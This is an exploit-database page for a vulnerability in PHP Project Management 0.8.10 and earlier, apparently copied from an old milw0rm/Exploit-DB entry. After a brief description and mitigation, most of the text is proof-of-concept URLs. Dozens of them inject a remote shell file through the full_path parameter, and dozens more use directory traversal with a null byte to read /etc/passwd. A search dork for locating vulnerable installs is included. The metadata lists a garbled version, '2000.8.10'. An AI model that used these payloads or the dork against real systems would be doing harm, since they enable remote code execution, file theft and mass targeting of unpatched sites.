PHP Project Management - exploit.company

vendor:

PHP Project Management

by:

Unknown

7.5

CVSS

HIGH

RFI / LFI

Unknown

CWE

Product Name: PHP Project Management

Affected Version From: 0.8.10 and earlier

Affected Version To: 2000.8.10

Patch Exists: Unknown

Related CWE: None provided

CPE: None provided

Metasploit:

Other Scripts:

Platforms Tested: None provided

Unknown

PHP Project Management <= 0.8.10 Multiple RFI / LFI Vulnerabilities

Multiple remote file inclusion (RFI) and local file inclusion (LFI) vulnerabilities in PHP Project Management version 0.8.10 and earlier allow remote attackers to execute arbitrary code or read arbitrary files via a full_path parameter in various modules.

Mitigation:

Upgrade to a version higher than 0.8.10 or apply a patch if available. Avoid providing untrusted input to the full_path parameter.

Source

Exploit-DB raw data:

#  PHP Project Management <= 0.8.10 Multiple RFI / LFI Vulnerabilities
#  http://surfnet.dl.sourceforge.net/sourceforge/php-pm/release-0.8.tar.gz
#  DORK : "PHP Project Management 0.8.10"
#  POC : RFI
#  /modules/certinfo/index.php?full_path=http://localhost/shell.txt?
#  /modules/emails/index.php?full_path=http://localhost/shell.txt?
#  /modules/events/index.php?full_path=http://localhost/shell.txt?
#  /modules/fax/index.php?full_path=http://localhost/shell.txt?
#  /modules/files/index.php?full_path=http://localhost/shell.txt?
#  /modules/files/list.php?full_path=http://localhost/shell.txt?
#  /modules/groupadm/index.php?full_path=http://localhost/shell.txt?
#  /modules/history/index.php?full_path=http://localhost/shell.txt?
#  /modules/info/index.php?full_path=http://localhost/shell.txt?
#  /modules/log/index.php?full_path=http://localhost/shell.txt?
#  /modules/mail/index.php?full_path=http://localhost/shell.txt?
#  /modules/messages/index.php?full_path=http://localhost/shell.txt?
#  /modules/organizations/index.php?full_path=http://localhost/shell.txt?
#  /modules/phones/index.php?full_path=http://localhost/shell.txt?
#  /modules/presence/index.php?full_path=http://localhost/shell.txt?
#  /modules/projects/index.php?full_path=http://localhost/shell.txt?
#  /modules/projects/summary.inc.php?full_path=http://localhost/shell.txt?
#  /modules/projects/list.php?full_path=http://localhost/shell.txt?
#  /modules/reports/index.php?full_path=http://localhost/shell.txt?
#  /modules/search/index.php?full_path=http://localhost/shell.txt?
#  /modules/snf/index.php?full_path=http://localhost/she ll.txt?
#  /modules/syslog/index.php?full_path=http://localhost/shell.txt?
#  /modules/tasks/searchsimilar.php?full_path=http://localhost/shell.txt?
#  /modules/tasks/index.php?full_path=http://localhost/shell.txt?
#  /modules/tasks/summary.inc.php?full_path=http://localhost/shell.txt?
#  /modules/useradm/index.php?full_path=http://localhost/shell.txt?
#  /ajax/loadsplash.php?full_path=http://localhost/shell.txt?
#  /blocks/birthday.php?full_path=http://localhost/shell.txt?
#  /blocks/events.php?full_path=http://localhost/shell.txt?
#  /blocks/help.php?full_path=http://localhost/shell.txt?
#  POC : LFI
#  /modules/certinfo/index.php?module=../../../../../../etc/passwd%00
#  /modules/emails/index.php?module=../../../../../../etc/passwd%00
#  /modules/events/index.php?module=../../../../../../etc/passwd%00
#  /modules/fax/index.php?module=../../../../../../etc/passwd%00
#  /modules/files/index.php?module=../../../../../../etc/passwd%00
#  /modules/files/list.php?def_lang=../../../../../../../../../etc/passwd%00
#  /modules/groupadm/index.php?module=../../../../../../etc/passwd%00
#  /modules/history/index.php?module=../../../../../../etc/passwd%00
#  /modules/info/index.php?module=../../../../../../etc/passwd%00
#  /modules/log/index.php?module=../../../../../../etc/passwd%00
#  /modules/mail/index.php?module=../../../../../../etc/passwd%00
#  /modules/messages/index.php?module=../../../../../../etc/passwd%00
#  /modules/organizations/index.php?module=../../../../../../etc/passwd%00
#  /modules/phones/index.php?module=../../../../../../etc/passwd%00
#  /modules/presence/index.php?module=../../../../../../etc/passwd%00
#  /modules/projects/index.php?module=../../../../../../etc/passwd%00
#  /modules/projects/summary.inc.php?m_path=../../../../../../etc/passwd%00
#  /modules/projects/list.php?module=../../../../../../etc/passwd%00
#  /modules/reports/index.php?module=../../../../../../etc/passwd%00
#  /modules/search/index.php?module=../../../../../../etc/passwd%00
#  /modules/snf/index.php?module=../../../../../../etc/passwd%00
#  /modules/syslog/index.php?module=../../../../../../etc/passwd%00
#  /modules/tasks/index.php?module=../../../../../../etc/passwd%00
#  /modules/tasks/summary.inc.php?m_path=../../../../../../etc/passwd%00
#  /modules/useradm/index.php?module=../../../../../../etc/passwd%00

# milw0rm.com [2007-10-21]